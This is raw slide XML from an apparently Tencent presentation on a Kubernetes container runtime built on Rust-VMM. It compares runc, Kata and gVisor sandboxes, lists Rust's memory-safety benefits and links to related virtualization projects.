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7" r:id="rId2"/>
    <p:sldId id="328" r:id="rId3"/>
    <p:sldId id="321" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="290" r:id="rId6"/>
    <p:sldId id="322" r:id="rId7"/>
    <p:sldId id="309" r:id="rId8"/>
    <p:sldId id="312" r:id="rId9"/>
    <p:sldId id="311" r:id="rId10"/>
    <p:sldId id="313" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="323" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="329" r:id="rId15"/>
    <p:sldId id="325" r:id="rId16"/>
    <p:sldId id="326" r:id="rId17"/>
    <p:sldId id="314" r:id="rId18"/>
    <p:sldId id="317" r:id="rId19"/>
    <p:sldId id="310" r:id="rId20"/>
    <p:sldId id="300" r:id="rId21"/>
    <p:sldId id="315" r:id="rId22"/>
    <p:sldId id="327" r:id="rId23"/>
    <p:sldId id="319" r:id="rId24"/>
    <p:sldId id="324" r:id="rId25"/>
    <p:sldId id="318" r:id="rId26"/>
    <p:sldId id="330" r:id="rId27"/>
    <p:sldId id="25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8339"/>
    <a:srgbClr val="206AED"/>
    <a:srgbClr val="88D9BE"/>
    <a:srgbClr val="D6E8D4"/>
    <a:srgbClr val="00B1F0"/>
    <a:srgbClr val="3D718E"/>
    <a:srgbClr val="2E75B5"/>
    <a:srgbClr val="00B14C"/>
    <a:srgbClr val="FAD0BF"/>
    <a:srgbClr val="67AB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64"/>
    <p:restoredTop sz="85986"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="11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17T08:12:20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8C6314-849B-7049-8B84-EC036E392299}" type="datetimeFigureOut">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>2020/7/22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77D84A-E57F-DC4D-AFD1-132B537C201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4653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loud-hypervisor/cloud-hypervisor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loud-hypervisor/cloud-hypervisor/blob/master/docs/device_model.md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kata-containers/documentation/blob/master/design/architecture.md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blog/products/gcp/exploring-container-security-isolation-at-different-layers-of-the-kubernetes-stack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kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster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nabla-containers.github.io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visor.dev/docs/architecture_guide/platforms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7D84A-E57F-DC4D-AFD1-132B537C2012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441651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然而，其中位于用户空间的原生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QEMU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却存在臃肿、响应慢、占用资源多等问题，以及不支持热升级和安全性不够细化等痛点，让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在应对业内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serverless、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高可用等场景需求时面临挑战。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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>13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04485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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>15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60730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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>16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876194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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>17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47194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set of virtualization rust crates for easy VMM implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>18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117892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free,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>free,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>wild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
          </a:p>
          <a:p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overflow,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>underflow,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>wild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pointer</a:t>
            </a:r>
          </a:p>
          <a:p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uninitialized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</a:p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races(often</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>leading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above)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>compiled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intended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programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Sponsored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Mozilla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secure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 err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(C++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Drop-in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>replacement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incremental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rewrites</a:t>
            </a:r>
          </a:p>
          <a:p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safety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thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>safety</a:t>
            </a:r>
          </a:p>
          <a:p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GC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>thereading</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C-compatible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>calling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>convention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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>19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10225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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>20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57461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https://github.com/cloud-hypervisor/cloud-hypervisor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>21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428292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https://github.com/cloud-hypervisor/cloud-hypervisor/blob/master/docs/device_model.md</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/kata-containers/documentation/blob/master/design/architecture.md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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>23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237983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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"/>
              <a:t>25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2060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https://cloud.google.com/blog/products/gcp/exploring-container-security-isolation-at-different-layers-of-the-kubernetes-stack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https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/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/wiki/Sandbox_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>computer_security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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7D84A-E57F-DC4D-AFD1-132B537C2012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54713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7D84A-E57F-DC4D-AFD1-132B537C2012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36061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入侵检测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7D84A-E57F-DC4D-AFD1-132B537C2012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86183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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0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27418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7D84A-E57F-DC4D-AFD1-132B537C2012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25218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https://nabla-containers.github.io/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7D84A-E57F-DC4D-AFD1-132B537C2012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22990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https://gvisor.dev/docs/architecture_guide/platforms/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7D84A-E57F-DC4D-AFD1-132B537C2012}" type="slidenum">
              <a:rPr lang="en-CN" smtClean="0"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57978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/kata-containers/documentation/blob/master/design/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>virtualization.md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/google/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gvisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blob/master/g3doc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_guide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>compatibility.md</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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7D84A-E57F-DC4D-AFD1-132B537C2012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56509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5E75BE9-EB9C-4A41-A4EC-4BC807EC40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013E8B-D8C4-3D42-B883-BFD9749AE8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3183" y="1093693"/>
            <a:ext cx="9886122" cy="399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39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23D54-FF23-DC43-BDC1-7C9CB291E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41C84B-EB95-504C-BA13-9C91D5B99F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407B5-E07B-A34C-BE41-BDB7E9CCE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9D598-F34F-974C-9BED-70D728FE1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7/22/20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4C315E-7554-6248-82BB-A1F3479AA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92A2A-9484-704F-8448-BEC2E5416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86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AD25D-D4D9-9B49-BCF4-BED67C0B6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A1B320-757B-9E4C-80EE-50CA31AB33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923A0-C47D-CF4A-9BFD-CE852F56A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7/22/20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19C6B-09CC-5140-8A0D-050AFDB74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69FE6-C499-6545-97CB-807D22E77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583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C6150A-49A0-A94E-8261-45284D2C29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6B609-CF01-9E40-8034-0330CF3625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8B4FA-5A83-C04F-9F30-EC585173B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7/22/20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3588A-3217-6446-8535-3F1E4CC70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3105A-F15E-1E49-9383-E6E4AE210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57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74A7CE2-8897-A045-AFD2-BCC6899D2E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8EE4D8-E0C7-4443-955C-37B5C1F748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0697" y="102508"/>
            <a:ext cx="3917358" cy="15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28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87677F5B-459E-6B4D-8EAB-094BBF738E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705C4A-9997-7344-90DE-D9F76C7284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429" y="35169"/>
            <a:ext cx="2554806" cy="103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98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3EC30-1EC6-0B45-886D-C54A28927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15AA9-E6D5-EB42-856D-D7F76E3DB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8C696-DB20-FE4E-BCA3-1E6D04DD7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7/22/20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BA9E8-6E9D-2643-BAC0-4C3A0DBB6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8B959-CE0A-9349-967C-65E9C9F16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58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2ABB8-9D88-6C41-80C4-559374A5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BBA06-00D4-984C-9728-9FBA0B5CAF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9369E2-743F-AE40-A501-4B413DA75D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7D002-7625-6C4D-A611-B3EF8178D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7/22/20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A28119-6209-3A42-9367-80745DEF7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714B60-64E5-D846-B4FA-C59A5F5F1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68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BF89B-CAA8-184C-9E27-A0BB1C7A7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8CDBD-425F-7A41-AD72-962CF2735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F23AAB-EA6F-564F-8EE2-D4C84F834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38FEF2-00C2-4144-B776-C071AD79DE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B557D1-2C72-E841-BF8D-F83754B46F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29C822-3D0C-0041-8C68-A647AAA81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7/22/20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117E9E-998E-C548-B640-68001DB4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F30649-9254-4D43-A6A1-96BF95619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99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B057D-5C2F-7F42-AE47-35F4172F7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226243-985E-4A42-A8E6-775F0BC54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7/22/20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5F59E0-176C-0645-BBB0-A001D77A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8BB6A-917E-7C4C-BF10-8C88D5FE2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55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43D1EE-4C18-D64D-AF72-D384686F4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7/22/20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24635D-A243-9C46-A344-A23C5578B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4CF0D-459F-C340-99B0-DA3FEF855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97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47A66-C88D-BC41-AF2A-C7EF18311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6AF67-140E-4F4B-9967-B2ABE5506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77706-4CDE-2F47-B3B6-32941E4BB4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6E5F8F-5A8E-1842-BFDB-7266F8F6F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7/22/20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97D77D-113D-E543-B73A-6171923F5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5C94A-858C-D545-9D1B-DBB397BFB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37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C480CF-C0EE-5943-BFB9-C1638E116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0343D-9B93-C141-A537-E7FE8084E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F46F0-409C-3E4E-BF8B-968079EE8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1F604-BC3A-7249-8689-657AF7B88D6C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/22/20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961B1-7C55-0C45-8BAC-6372BEDFAC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D276A-E708-6147-A1E3-375C693EDC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5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loud.tencent.com/product/eks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ust-vmm/community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ium.googlesource.com/chromiumos/platform/crosv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firecracker-microvm/firecracker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customXml" Target="../ink/ink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crates.io/crates/bindgen" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/vmm-sys-util/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/vmm-vcpu/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crates.io/crates/kvm-bindings" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/vm-memory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rust-vmm/vm-virtio/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/virtio-bindings" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/linux-loader" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/vfio-bindings" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rust-vmm/event-manager" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crates.io/crates/kvm-ioctls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kestack/tke" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.tencent.com/product/tke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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://careers.tencent.com/home.html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ccncchina2018english.sched.com/event/FuLz/layers-of-isolation-in-kubernetes-tim-allclair-googl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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.tiff"/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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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tiff"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.tiff"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://landscape.cncf.io/category=container-runtime&amp;format=card-mode&amp;grouping=category" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.tiff"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.tiff"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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42D4B4-BF92-D14A-BF1C-9878B92A2A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559904" y="3429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Yingzhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Ru(@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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ruyingzhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Tencent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="36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Liangyu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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Zhou(@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="36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choujimmy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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Tencent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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E3EC15-5521-4C4D-8C50-80159D61BEC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559904" y="21398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 Kubernetes Runtime Based on Rust-VMM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FDBFD7-2CAB-1B49-AB14-34091E73C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6162" y="6020206"/>
            <a:ext cx="3412868" cy="50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77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0FB772E-96CB-0446-B014-2EE96E9F0642}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769672" y="3145960"/>
            <a:ext cx="1377579" cy="962756"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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kata-runtime</a:t>
            </a:r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B70B9F8-19C2-3A47-A1A9-DE19420B941C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783550" y="1600480"/>
            <a:ext cx="1377579" cy="962756"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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runc</a:t>
            </a:r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FE447B3-B558-3B4C-AB69-A5B4094DC2CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783549" y="4979949"/>
            <a:ext cx="1377579" cy="962756"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="88D9BE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runsc</a:t>
            </a:r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AE95F0-E4DC-5442-A73D-D5A5C7779A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7988266" y="1625197"/>
            <a:ext cx="2087964" cy="90038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399E6D-5730-E542-BC77-CCED96F0670E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647678" y="1732668"/>
            <a:ext cx="1067030" cy="466449"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D7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container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="12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87114C7-8218-A049-BA09-AF32AC3D743A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8819875" y="1910099"/>
            <a:ext cx="1067030" cy="466449"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D7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container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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2F2E76-8223-0B4B-AF96-31328DAF2F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8087856" y="1591210"/>
            <a:ext cx="537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Pod</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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0DA3AE-9F69-1749-9395-78B8E631AC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4845331" y="2978490"/>
            <a:ext cx="27941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QEMU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>VMM</a:t>
            </a:r>
          </a:p>
          <a:p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</a:rPr>
              <a:t>Firecracker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</a:rPr>
              <a:t>VMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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Rust-VMM</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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6F62718-19ED-794A-8EA5-FB5DC7DC86B0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4161129" y="2075388"/>
            <a:ext cx="3827137" cy="6470"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D7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A4E1611-ED25-8D43-B0B8-7F475F9F3ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4147251" y="3612440"/>
            <a:ext cx="3200308" cy="14898"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D718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BE9EB11-7BD9-3B42-9BD7-144458AFA92A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="71" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4161128" y="5461327"/>
            <a:ext cx="2261489" cy="1134"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="3D718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F261F04-130C-1C43-9284-65870F287010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7347559" y="2894251"/>
            <a:ext cx="2728672" cy="1436378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035A64A-2FE4-8C4A-9809-CAA63305610C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8733429" y="3385782"/>
            <a:ext cx="1067030" cy="466449"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D7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container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1200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F12A7B5-3F39-154E-8297-926FB40D4EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869051" y="3504626"/>
            <a:ext cx="1067030" cy="466449"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D7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container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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8B59C2-9A65-FF48-93D6-179EDC0B50FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7435718" y="2963517"/>
            <a:ext cx="1287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Pod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1600" dirty="0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C30A3F87-B899-4045-8BFE-E13223C960CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7590918" y="3402804"/>
            <a:ext cx="884643" cy="413551"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAD0BF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Agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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05819B2-B8C2-BC4A-ACA3-AF18AEF15E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5065731" y="5049759"/>
            <a:ext cx="1030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gVisor</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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B6CD3CF-D3D2-5149-B206-92FB1388A387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7714139" y="4054592"/>
            <a:ext cx="2098551" cy="285348"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C2DA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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guest Kernel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67A76BC-8E9F-F64B-B449-E5C94006F793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210610" y="1277257"/>
            <a:ext cx="429200" cy="5514861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="lg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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
          </a:p>
          <a:p>
